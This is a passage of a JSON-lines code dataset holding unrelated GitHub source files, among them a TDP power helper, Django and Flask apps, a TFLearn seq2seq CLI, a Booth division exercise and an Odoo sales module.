api_key_for_request = AirConditionGetter.API_KEYS[randint(0, len(AirConditionGetter.API_KEYS) - 1)]\n\n response = requests.get(\n AirConditionGetter.API_PATH,\n [\n (\"lon\", coordinates[0]),\n (\"lat\", coordinates[1]),\n (\"key\", api_key_for_request),\n (\"fields\", \"breezometer_aqi\")\n ]\n )\n\n data.append({\n GEOM_COLUMN: geometry.Point(coordinates[0], coordinates[1]),\n \"aqi\": json.loads(response.text)['breezometer_aqi']\n })\n\n return gpd.GeoDataFrame(data, geometry=GEOM_COLUMN)\n\n\nif __name__ == '__main__':\n ac = AirConditionGetter()\n bbox = map(float, sys.argv[1:])\n\n result = ac.get_df(*bbox)\n\n with open('out.json', 'w') as f:\n r = json.dumps(result)\n f.write(str(r))\n","repo_name":"UCU-urban-intelligence/scrapper","sub_path":"scripts/air_condition.py","file_name":"air_condition.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40689758961","text":"import os\nfrom subprocess import run\nfrom chimera_app.config import BIN_PATH\n\n\nPOWER_TOOL_PATH = os.path.join(BIN_PATH, 'power-tool')\n\n\nDEVICE_DB = {\n 'AYANEO::AYANEO 2' : {\n 'tdp_min' : 15,\n 'tdp_max' : 28,\n }\n}\n\n\ndef get_device_info():\n product_name = open('/sys/devices/virtual/dmi/id/product_name', 'r').read().strip()\n vendor_name = open('/sys/devices/virtual/dmi/id/sys_vendor', 'r').read().strip()\n\n key = vendor_name + '::' + product_name\n\n if not key in DEVICE_DB:\n return None\n\n return DEVICE_DB[key]\n\n\ndef get_tdp():\n device = get_device_info()\n if not device:\n return\n\n results = run([ 'sudo', '--non-interactive', POWER_TOOL_PATH, 'get-tdp' ], capture_output=True, text=True)\n lines = results.stdout.splitlines()\n\n tdp = None\n if len(lines) > 0:\n tdp = results.stdout.splitlines()[0]\n\n if not tdp:\n return\n\n return int(tdp)\n\n\ndef set_tdp(new_tdp):\n if type(new_tdp) != int:\n return\n\n device = get_device_info()\n if not device:\n return\n\n if new_tdp < device['tdp_min'] or new_tdp > device['tdp_max']:\n return\n\n run([ 'sudo', '--non-interactive', POWER_TOOL_PATH, 'set-tdp', str(new_tdp) ])\n","repo_name":"ukos-git/chimera","sub_path":"chimera_app/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"18115319489","text":"from exts 
import db\r\n\r\n\r\nclass Goods(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n gname = db.Column(db.String(100), nullable=False) # 商品名\r\n price = db.Column(db.Float, nullable=False) # 价格\r\n users = db.relationship('User', backref='goodslist', secondary='user_goods') \r\n # 因为goods表和user表没有直接外键,所以用参数secondary='user_goods'意思就是,如果要通过goods表找user 可以通过user_goods找,因为 user_goods表和user表有外键关系,(意思就是去第三方的表里去找)\r\n # 模型名 User secondary='user_goods'=号后是表名\r\n # backref ==> back reference 反向查找\r\n\r\n def __str__(self):\r\n return self.gname\r\n\r\n\r\n# tags = db.Table('User_goods', # 表名\r\n# db.Column('user_id', db.Integer, db.ForeignKey('user.id')), # user_id ,主键参考 user.id\r\n# db.Column('goods_id', db.Integer, db.ForeignKey('goods.id')) # goods_id ,主键参考 goods.id\r\n# db.Column('number', default=1) # 字段\r\n\r\n\r\n# 关系表 承接的是 user和goods之间的关系\r\nclass User_goods(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n # user表的id 表名也就是 class User(db.Model) 函数名,生成数据表后就是小写的了\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id')) \r\n # goods表的id 表名也就是 class Goods(db.Model) 函数名,生成数据表后就是小写的了\r\n goods_id = db.Column(db.Integer, db.ForeignKey('goods.id')) \r\n number = db.Column(db.Integer, default=1)\r\n","repo_name":"aixiu/qianfeng-python-flask","sub_path":"flaskblog/apps/goods/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73186767845","text":"#-*- coding:utf-8 _*- \n\"\"\" \n@author:charlesXu\n@file: tflearn_seq2seq.py \n@desc: https://github.com/ichuang/tflearn_seq2seq/blob/master/tflearn_seq2seq.py\n@time: 2017/10/23 \n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport os\nimport sys\nimport tflearn\nimport argparse\nimport json\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom pattern import SequencePattern\n\n\nclass TFLearnSeq2Seq(object):\n '''\n seq2seq recurrent nerual network.\n '''\n AVAILABLE_MODELS = [\"embedding_rnn\", \"embedding_attention\"]\n\n def __init__(self, sequence_pattern, seq2seq_model=None, verbose=None, name=None, data_dir=None):\n self.sequence_pattern = sequence_pattern\n self.seq2seq_model = seq2seq_model or \"embedding_rnn\"\n assert self.seq2seq_model in self.AVAILABLE_MODELS\n self.in_seq_len = self.sequence_pattern.INPUT_SEQUENCE_LENGTH\n self.out_seq_len = self.sequence_pattern.OUTPUT_SEQUENCE_LENGTH\n self.in_max_int = self.sequence_pattern.INPUT_MAX_INT\n self.out_max_int = self.sequence_pattern.OUTPUT_MAX_INT\n self.verbose = verbose or 0\n self.n_input_symbols = self.in_max_int + 1\n self.n_output_symbols = self.out_max_int + 2 # extra one for GO symbol\n self.model_instance = None\n self.name = name\n self.data_dir = data_dir\n\n def generate_training_data(self, num_points):\n x_data = np.random.randint(0, self.in_max_int, size=(num_points, self.in_seq_len))\n x_data = x_data.astype(np.uint32) # ensure integer type\n\n y_data = [ self.sequence_pattern.generate_output_sequence(x) for x in x_data]\n y_data = np.array(y_data)\n\n xy_data = np.append(x_data, y_data, axis=1)\n return xy_data, y_data\n\n def sequence_loss(self, y_pred, y_true):\n '''\n Loss function for the seq2seq RNN. 
Reshape predicted and true (label) tensors, generate dummy weights,\n then use seq2seq.sequence_loss to actually compute the loss function.\n :param y_pred:\n :param y_true:\n :return:\n '''\n if self.verbose > 2 : print(\"my_sequence_loss y_pred=%s, y_true=%s\" % (y_pred, y_true))\n logits = tf.unstack(y_pred, axis=1)\n targets = tf.unstack(y_true, axis=1)\n\n def CommandLine(args=None, arglist=None):\n '''\n Main command line. Accepts args, to allow for simple unit testing.\n '''\n help_text = \"\"\"\n Commands:\n train - give size of training set to use, as argument\n predict - give input sequence as argument (or specify inputs via --from-file )\n \"\"\"\n\n parser = argparse.ArgumentParser(description=help_text, formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument(\"cmd\", help=\"command\")\n parser.add_argument(\"cmd_input\", nargs='*', help=\"input to command\")\n parser.add_argument('-v', \"--verbose\", nargs=0,\n help=\"increase output verbosity (add more -v to increase versbosity)\", action=VAction, dest='verbose')\n parser.add_argument(\"-m\", \"--model\",\n help=\"seq2seq model name: either embedding_rnn (default) or embedding_attention\", default=None)\n parser.add_argument(\"-r\", \"--learning-rate\", type=float, help=\"learning rate (default 0.0001)\", default=0.0001)\n parser.add_argument(\"-e\", \"--epochs\", type=int, help=\"number of trainig epochs\", default=10)\n parser.add_argument(\"-i\", \"--input-weights\", type=str, help=\"tflearn file with network weights to load\",\n default=None)\n parser.add_argument(\"-o\", \"--output-weights\", type=str,\n help=\"new tflearn file where network weights are to be saved\", default=None)\n parser.add_argument(\"-p\", \"--pattern-name\", type=str, help=\"name of pattern to use for sequence\", default=None)\n parser.add_argument(\"-n\", \"--name\", type=str, help=\"name of model, used when generating default weights filenames\",\n default=None)\n parser.add_argument(\"--in-len\", type=int, help=\"input sequence length (default 10)\", default=None)\n parser.add_argument(\"--out-len\", type=int, help=\"output sequence length (default 10)\", default=None)\n parser.add_argument(\"--from-file\", type=str, help=\"name of file to take input data sequences from (json format)\",\n default=None)\n parser.add_argument(\"--iter-num\", type=int,\n help=\"training iteration number; specify instead of input- or output-weights to use generated filenames\",\n default=None)\n parser.add_argument(\"--data-dir\",\n help=\"directory to use for storing checkpoints (also used when generating default weights filenames)\",\n default=None)\n # model parameters\n parser.add_argument(\"-L\", \"--num-layers\", type=int, help=\"number of RNN layers to use in the model (default 1)\",\n default=1)\n parser.add_argument(\"--cell-size\", type=int, help=\"size of RNN cell to use (default 32)\", default=32)\n parser.add_argument(\"--cell-type\", type=str, help=\"type of RNN cell to use (default BasicLSTMCell)\",\n default=\"BasicLSTMCell\")\n parser.add_argument(\"--embedding-size\", type=int, help=\"size of embedding to use (default 20)\", default=20)\n parser.add_argument(\"--tensorboard-verbose\", type=int, help=\"tensorboard verbosity level (default 0)\", default=0)\n\n if not args:\n args = parser.parse_args(arglist)\n\n if args.iter_num is not None:\n args.input_weights = args.iter_num\n args.output_weights = args.iter_num + 1\n\n model_params = dict(num_layers = args.num_layers,\n cell_size = args.cell_size,\n cell_type = args.cell_type,\n 
embedding_size = args.embedding_size,\n learning_rate = args.learning_rate,\n tensorboard_verbose = args.tensorboard_verbose)\n\n if args.cmd == \"train\":\n try:\n num_points = int(args.cmd_input[0])\n except:\n raise Exception(\"Please specify the number of datapoints to use for training, as the first argument\")\n sp = SequencePattern(args.pattern_name, in_seq_len=args.in_len, out_seq_len=args.out_len)\n ts2s = TFLearnSeq2Seq(sp, seq2seq_model=args.model, data_dir=args.data_dir, name=args.name, verbose=args.verbose)\n ts2s.train(num_epochs=args.epochs, num_points=num_points, weights_output_fn=args.output_weights,\n weights_input_fn=args.input_weights, model_params=model_params)\n return ts2s\n\n elif args.cmd == \"predict\":\n if args.from_file:\n inputs = json.loads(args.from_file)\n try:\n input_x = map(int, args.cmd_input)\n inputs = [input_x]\n except:\n raise Exception(\"Please provide a space-delimited input sequence as the argument\")\n\n sp = SequencePattern(args.pattern_name, in_seq_len=args.in_len, out_seq_len=args.out_len)\n ts2s = TFLearnSeq2Seq(sp, seq2seq_model=args.model, data_dir=args.data_dir, name=args.name,\n verbose=args.verbose)\n results = []\n for x in inputs:\n prediction, y = ts2s.predict(x, weights_input_fn=args.input_weights, model_params=model_params)\n print(\"==> For input %s, prediction=%s (expected=%s)\" % (x, prediction, sp.generate_output_sequence(x)))\n results.append([prediction, y])\n ts2s.prediction_results = results\n return ts2s\n\n else:\n print(\"Unknown command %s\" % args.cmd)\n\n if __name__ == \"__main__\":\n CommandLine()","repo_name":"cash2one/MachineLearning-2","sub_path":"DeepLearning/tflearn/tflearn_seq2seq.py","file_name":"tflearn_seq2seq.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37453062279","text":"calculation_to_units = 24\nname_of_unit = \"hours\"\n\ndef days_to_units(num_of_days):\n #condition_check = num_of_days > 0\n #print(type(condition_check))\n\n if num_of_days > 0:\n return(f\"{num_of_days} days are {num_of_days * calculation_to_units} {name_of_unit}\")\n elif num_of_days == 0:\n return \"you entered a number that is 0 days, no conversion value\"\n else:\n return \"you entered a negative value, no conversion value\"\n\nuser_input = input(\"Hey user, enter a number of days and i will convert it to hours!\\n\")\nif user_input.isdigit():\n user_input_number = int(user_input)\n calculated_value = days_to_units(int(user_input))\n print(calculated_value)\nelse:\n print(\"your input is not a number. 
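# CommandLine() above is a conventional argparse layout; this tiny sketch
# mirrors its core moves (a positional command, variadic inputs, a typed
# option with a default) and parses from an explicit list, which is also how
# its arglist parameter supports unit testing.
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("cmd")
parser.add_argument("cmd_input", nargs="*")
parser.add_argument("-e", "--epochs", type=int, default=10)

args = parser.parse_args(["train", "5000", "--epochs", "3"])
print(args.cmd, args.cmd_input, args.epochs)  # train ['5000'] 3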
Don't ruin my program\")\n\n\n\n\n","repo_name":"roberton4real/nj-pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72248982565","text":"#!/usr/bin/python\nimport sys\nImport ('env')\n\n\nsource_files = ['bmfont.cpp',\n 'GPC_Canvas.cpp',\n 'GPC_Engine.cpp',\n 'GPC_KeyboardDevice.cpp',\n 'GPC_MouseDevice.cpp',\n 'GPC_RawImage.cpp',\n 'GPC_RawLoadDotBlendArray.cpp',\n 'GPC_RawLogoArrays.cpp',\n 'GPC_RenderTools.cpp',\n 'GPC_System.cpp']\n\nincs = ['.',\n '#intern/string',\n '#intern/ghost',\n '#intern/guardedalloc',\n '#intern/moto/include',\n '#intern/container',\n '#source/gameengine/Rasterizer/RAS_OpenGLRasterizer',\n '#source/gameengine/Converter',\n '#source/gameengine/BlenderRoutines',\n '#source/blender/imbuf',\n '#source/gameengine/Ketsji',\n '#source/blender/blenlib',\n '#source/blender/blenfont',\n '#source/blender/blenkernel',\n '#source/blender',\n '#source/blender/include',\n '#source/blender/makesdna',\n '#source/gameengine/BlenderRoutines',\n '#source/gameengine/Rasterizer',\n '#source/gameengine/GameLogic',\n '#source/gameengine/Expressions',\n '#source/gameengine/Network',\n '#source/gameengine/SceneGraph',\n '#source/gameengine/Physics/common',\n '#source/gameengine/Network/LoopBackNetwork',\n '#source/gameengine/GamePlayer/ghost',\n '#source/blender/misc',\n '#source/blender/blenloader',\n '#source/blender/gpu',\n '#extern/glew/include']\n\ndefs = [ 'GLEW_STATIC' ]\n\nif env['WITH_BF_PYTHON']:\n incs += Split(env['BF_PYTHON_INC'])\n defs.append('WITH_PYTHON')\n\nincs += Split(env['BF_PNG_INC'])\nincs += Split(env['BF_ZLIB_INC'])\n\nenv.BlenderLib (libname='ge_player_common', sources=source_files, includes=incs, defines = defs, libtype=['player'], priority=[5], cxx_compileflags=env['BGE_CXXFLAGS'])\n","repo_name":"damiles/blendocv","sub_path":"source/gameengine/GamePlayer/common/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"52"} +{"seq_id":"9575099240","text":"from django.conf.urls import url\nfrom . 
import views\n \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^logout$', views.logout),\n url(r'^create_message$', views.create_message),\n url(r'^create_comment$', views.create_comment),\n url(r'^delete_comment$', views.delete_comment),\n url(r'^delete_message$', views.delete_message)\n]\n","repo_name":"LeahTalk/the_wall","sub_path":"apps/messages_and_comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4902644561","text":"import sys\n\n\ndef main():\n \"\"\"\n Executes the building function an catches and prints AssertationErrors\n \"\"\"\n try:\n building()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n\n\ndef building():\n \"\"\"\n Takes a string from the commandline arguments and counts \\\n different aspects of the string like\n - uppercase characters\n - lowercase characters\n - punctuation characters\n - space characters\n - digit characters\n and prints them.\n\n If more than 1 argument is provided a \"AssertionError: more \\\n than one argument is provided\" is thrown.\n If no argument is provided the user is prompted to give on \\\n via the command line.\n \"\"\"\n argv = sys.argv\n argc = len(argv)\n\n if argc > 2:\n assert False, \"more than one argument is provided\"\n\n sentence = \"\"\n if argc == 1:\n sentence = input(\"What is the text to count?\\n\")\n else:\n sentence = argv[1]\n\n punctuation_posibilities = \".,;:!?\\\"-\"\n\n upper = 0\n lower = 0\n punctuation = 0\n spaces = 0\n digits = 0\n\n for letter in sentence:\n if letter.isupper():\n upper += 1\n elif letter.islower():\n lower += 1\n elif letter in punctuation_posibilities:\n punctuation += 1\n elif letter.isspace():\n spaces += 1\n elif letter.isdigit():\n digits += 1\n\n print(\"The text contains\", len(sentence), \"characters\")\n print(upper, \"upper letters\")\n print(lower, \"lower letters\")\n print(punctuation, \"punctuation marks\")\n print(spaces, \"spaces\")\n print(digits, \"digits\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FelixBrgm/42_python_piscine","sub_path":"source/0/ex05/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42200565180","text":"from helper import *\n\ndef boothes(dividend,divisor):\n\tif divisor==0:\n\t\tprint(\"Divisor cannot be zero\")\n\t\treturn\n\taplusq=convert_twos_complement(dividend,22)\n\tm=convert_twos_complement(divisor,11)\n\tflag1=0\n\tflag2=0\n\tif aplusq[0]==\"1\":\n\t\taplusq=twos_complement(aplusq,22)\n\t\tflag1=1\n\tif m[0]==\"1\":\n\t\tm=twos_complement(m,11)\n\t\tflag2=1\t\t\t\t\n\ta=aplusq[:11]\n\tq=aplusq[11:]\n\tcount=11\n\tprint(\"Step:\",0,\"A:\",a,\"Q:\",q,\"M:\",m)\n\tfor i in range(count):\n\t\taplusq=a+q\n\t\taplusq=aplusq[1:]+\"0\"\n\t\ta=aplusq[:11]\n\t\tq=aplusq[11:]\n\t\tprevious=a\n\t\tif m[0]==aplusq[0]:\n\t\t\ta=add(aplusq[:11],twos_complement(m,11))\n\t\telse:\n\t\t\ta=add(aplusq[:11],m)\t\n\t\tif a[0]==previous[0] or (a==(\"0\"*11) and q==\"0\"*11):\n\t\t\tq=q[:-1]+\"1\"\n\t\telse:\n\t\t\ta=previous\n\t\tprint(\"Step:\",i+1,\"A:\",a,\"Q:\",q,\"M:\",m)\n\n\tif flag1==1 and flag2==0:\n\t\tq=twos_complement(q,11)\n\t\ta=twos_complement(a,11)\n\tif flag1==0 and flag2==1:\n\t\tq=twos_complement(q,11)\n\tif flag1==1 and 
flag2==1:\n\t\ta=twos_complement(a,11)\n\tprint(\"Quotient:\",q,\"Remainder:\",a)\n\ta=twos_complement_to_decimal(a)\n\tq=twos_complement_to_decimal(q)\t\n\tprint(\"Quotient:\",q,\"Remainder:\",a)\n\nc=[456,-10,-20,-1000,1000]\nd=[0,-3,3,-1,1000]\n\nfor i in range(5):\n\tprint(\"Sample Test\",i+1,\":\",c[i],\"divided by\",d[i])\n\tboothes(c[i],d[i])\n\tprint(\"----x----x-----x-----x----\")\t\n\nprint(\"Enter Dividend : \")\ndividend=int(input())\nprint(\"Enter Divisor : \")\ndivisor=int(input())\nboothes(dividend,divisor)\n","repo_name":"vishwesh-D-kumar/CSE-112-Boothes-Multiplication-and-Division","sub_path":"division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17456428198","text":"from django.shortcuts import render\n\nfrom data01.models import pd1_time\nfrom data01.models import pd2\nfrom datetime import datetime, timedelta\n\n# Create your views here.\n\ndef test(request):\n return render(request,'data01/test.html',{})\n\ndef test_pd1_time(request):\n time=pd1_time.objects.exclude(title__exact='')\n return render(request,'data01/test_pd1_time.html',{'time':time})\n\ndef test_pd2(request):\n time=pd1_time.objects.exclude(title__exact='')\n return render(request,'data01/test_pd2.html',{'two':two})\n\n#아래에 있는 함수는 PosterData의 when을 datafield로 변경된 후에 실행가능함.\ndef index_tutorial(request):\n #today, tomorrow, this_week에는 오늘, 내일, 이번주의 주 번호가 들어감\n #주 번호는 52주 중 몇번째 주인지 나타내는 번호임\n #이 세개 변수는 python의 datetime 모듈을 사용했음.\n today=datetime.today()\n tomorrow=today+timedelta(days=1)\n this_week=today.isocalendar()[1] #week number\n date_KOR=[\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\n date=date_KOR[today.weekday()]\n #today_list, tomorrow_list, this_week_list에는 각각 오늘 내일 이번주 강연 데이터가 들어있음\n #각각 조건에 맞는 filter를 이용하였음.\n today_list=pd1_time.objects.filter(date__year=today.year, date__month=today.month, date__day=today.day)\n tomorrow_list=pd1_time.objects.filter(date__year=tomorrow.year, date__month=tomorrow.month, date__day=tomorrow.day)\n this_week_list=pd1_time.objects.filter(date__week=this_week)\n #return render(request,'data01/index.html',today_list)\n contents={'date':date, 'today_list':today_list,'tomorrow_list':tomorrow_list,'this_week_list':this_week_list}\n return render(request,'data01/index_tutorial.html',contents)\n'''\ndef about(request):\n return render(request,'about site')\n'''\n\ndef index(request):\n today=datetime.today()\n tomorrow=today+timedelta(days=1)\n this_week=today.isocalendar()[1]\n date_KOR=[\"월\",\"화\",\"수\",\"목\",\"금\",\"토\",\"일\"]\n date=date_KOR[today.weekday()]\n #start date와 end date 사이 값에 today, tomorrow, this_week중 하나라도 포함되면 list에 포함시켜야함\n #테스트용으로 startdate만으로 비교해볼것.\n today_list=pd2.objects.filter(startdate__year=today.year, startdate__month=today.month, startdate__day=today.day)\n tomorrow_list=pd2.objects.filter(startdate__year=tomorrow.year, startdate__month=tomorrow.month, startdate__day=tomorrow.day)\n\n this_week_list=pd2.objects.filter(startdate__week=this_week)\n contents={'date':date, 'today_list':today_list,'tomorrow_list':tomorrow_list,'this_week_list':this_week_list}\n return render(request,'data01/index.html',contents)\n'''\ndef category(request, kind):\n return render(request,'카테고리에 따른 
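# helper.py is not shown alongside the Booth division routine above, so the
# following is only an assumed, self-contained sketch of the fixed-width
# two's-complement encode/decode that code depends on.
def to_twos_complement(value, bits):
    return format(value & ((1 << bits) - 1), '0{}b'.format(bits))

def from_twos_complement(bitstring):
    value = int(bitstring, 2)
    if bitstring[0] == '1':            # sign bit set: subtract 2**width
        value -= 1 << len(bitstring)
    return value

print(to_twos_complement(-10, 11))           # 11111110110
print(from_twos_complement('11111110110'))   # -10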
포스터')\n'''\n","repo_name":"jyhong1/poslun","sub_path":"webserver01/data01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16166451969","text":"__author__ = 'Dworkin'\n\nstore_path = './DATA/store.csv'\ntest_path = './DATA/test.csv'\ntrain_path = './DATA/train.csv'\nsubmission_path = './DATA/sample_submission.csv'\n\nstore_descr_df_path = './Results/store_descr.csv'\next_sales_df_path = './Results/ext_sales.csv'\nrez_sparse_one_hot_path = './Results/rez_one_hot_sparse.pickle'\n","repo_name":"perevalovtimur/Kaggle_Rossman","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31158841569","text":"# -*- coding: utf-8 -*-\n \nfrom odoo import api, fields, models\nfrom odoo import tools, _\nfrom odoo.exceptions import ValidationError\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.multi\n def _order_count(self):\n obj = self.env['sale.order']\n for order in self:\n order.variation_order_count = obj.search_count([('sales_order', '=', order.id)])\n\n is_variation_order = fields.Boolean(string=\"Is a Variation Order\", default=lambda *a: False, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n sales_order = fields.Many2one('sale.order', string=\"Sales Order\", readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n billed = fields.Boolean(string=\"Billed\", store=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n variation_order_count = fields.Integer(compute=_order_count, string=\"Variation Orders\")\n \n @api.multi\n @api.onchange('partner_id')\n def compute_sales_order(self):\n if not self.partner_id:\n return {'domain': {'sales_order': []}}\n domain = {'sales_order': ['&',('partner_id', '=', self.partner_id.id), ('is_variation_order', '=', False), ('state','=','sale')]}\n result = {'domain': domain}\n return result\n\n @api.model\n def create(self, vals):\n if vals.get('name', _('New')) == _('New'):\n if 'is_variation_order' in vals and vals.get('is_variation_order'):\n vals['name'] = self.env['ir.sequence'].next_by_code('sale.order.vo') or _('New')\n elif 'company_id' in vals:\n vals['name'] = self.env['ir.sequence'].with_context(force_company=vals['company_id']).next_by_code(\n 'sale.order') or _('New')\n else:\n vals['name'] = self.env['ir.sequence'].next_by_code('sale.order') or _('New')\n\n # Makes sure partner_invoice_id', 'partner_shipping_id' and 'pricelist_id' are defined\n if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):\n partner = self.env['res.partner'].browse(vals.get('partner_id'))\n addr = partner.address_get(['delivery', 'invoice'])\n vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])\n vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])\n vals['pricelist_id'] = vals.setdefault('pricelist_id',\n partner.property_product_pricelist and partner.property_product_pricelist.id)\n result = super(SaleOrder, self).create(vals)\n return 
result\n","repo_name":"Muhammad-SF/Test","sub_path":"core/so_vo_progress_billing/models/so_vo_progress_billing.py","file_name":"so_vo_progress_billing.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32023967002","text":"#!/usr/bin/env python3\n\n# code copied from \n# https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/Importing%20Notebooks.html\n\nimport io\nfrom nbformat import read\nfrom pygments import highlight\nfrom pygments.lexers import PythonLexer\nfrom pygments.formatters import HtmlFormatter\n\nfrom IPython.display import display, HTML\n\nformatter = HtmlFormatter()\nlexer = PythonLexer()\n\n# publish the CSS for pygments highlighting\ndisplay(\n    HTML(\"\"\"\n<style type='text/css'>\n%s\n</style>\n\"\"\" % formatter.get_style_defs()))\n\n\ndef show_notebook(fname):\n    \"\"\"display a short summary of the cells of a notebook\"\"\"\n    with io.open(fname, 'r', encoding='utf-8') as f:\n        nb = read(f, 4)\n    html = []\n    for cell in nb.cells:\n        html.append(\"<h4>%s cell</h4>\" % cell.cell_type)\n        if cell.cell_type == 'code':\n            html.append(highlight(cell.source, lexer, formatter))\n        else:\n            html.append(\"<pre>%s</pre>
\" % cell.source)\n display(HTML('\\n'.join(html)))\n\n\n# show_notebook(os.path.join(\"nbpackage\", \"mynotebook.ipynb\"))\n# show_notebook('baseline.ipynb')","repo_name":"tddschn/jupyter-utils-tddschn","sub_path":"jupyter_utils_tddschn/notebook_shower.py","file_name":"notebook_shower.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7597015806","text":"import matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nplt.switch_backend(\"agg\")\nimport numpy as np\nimport os\nfrom panaxea.toolkit.Toolkit import depickle_from_lite\n\nfrom model.agents.CancerCell import CancerCell\n\n\ndef get_avg_num_agents(models):\n \"\"\"\n Given a set of model lite objects, returns a dictionary containing\n average number of agents at each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n dict\n A dictionary of average numbers of agents, with keys: cancerCells,\n tipCells, aliveCancerCells, deadCancerCells\n \"\"\"\n num_cancer = np.mean(\n [m.output[\"agentNums\"][\"cancerCells\"] for m in models], axis=0)\n tip_cells = np.mean([m.output[\"agentNums\"][\"tipCells\"] for m in models],\n axis=0)\n alive_cancer_cells = np.mean([m.output[\"agentNums\"][\"aliveCancerCells\"]\n for m in models], axis=0)\n dead_cancer_cells = np.mean([m.output[\"agentNums\"][\"deadCancerCells\"]\n for m in models], axis=0)\n\n return {\n \"cancerCells\": num_cancer,\n \"tipCells\": tip_cells,\n \"aliveCancerCells\": alive_cancer_cells,\n \"deadCancerCells\": dead_cancer_cells\n }\n\n\ndef get_avg_oxygen_concentrations(models):\n \"\"\"\n Given a set of model lites, returns a dictionary containing average,\n maximum and minimum oxygen concentrations at each\n epoch.\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n dict\n A dictionary of average, maximum and minimum oxygen concentrations.\n\n \"\"\"\n avg_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgOxygen\"] for m in models],\n axis=0)\n min_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"minOxygen\"] for m in models],\n axis=0)\n max_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"maxOxygen\"] for m in models],\n axis=0)\n\n return {\n \"avg_oxygen\": avg_oxygen,\n \"min_oxygen\": min_oxygen,\n \"max_oxygen\": max_oxygen\n }\n\n\ndef get_avg_cancer_props(models):\n \"\"\"\n Given a set of model lites, returns a dictionary containing average\n cancer cell properties at each epoch.\n Parameters\n ----------\n models : list\n\n Returns\n -------\n dict\n The set of models lite (eg: As obtained through getModels)\n\n \"\"\"\n avg_hif = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgHif\"] for m in models], axis=0)\n avg_vegf = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgVegf\"] for m in models], axis=0)\n avg_metabolic_rate = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgMetabolicRates\"] for m in\n models], axis=0)\n avg_p_synthesis = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgPSynthesis\"] for m in models],\n axis=0)\n\n return {\n \"avgHif\": avg_hif,\n \"avgVegf\": avg_vegf,\n \"avgMetabolicRate\": avg_metabolic_rate,\n \"avgPSynthesis\": avg_p_synthesis\n }\n\n\ndef get_avg_vegf_stimulus(models):\n \"\"\"\n Given a set of model lites, returns a list of average vegf stimulus\n values at endothelial cells for each epoch.\n\n\n 
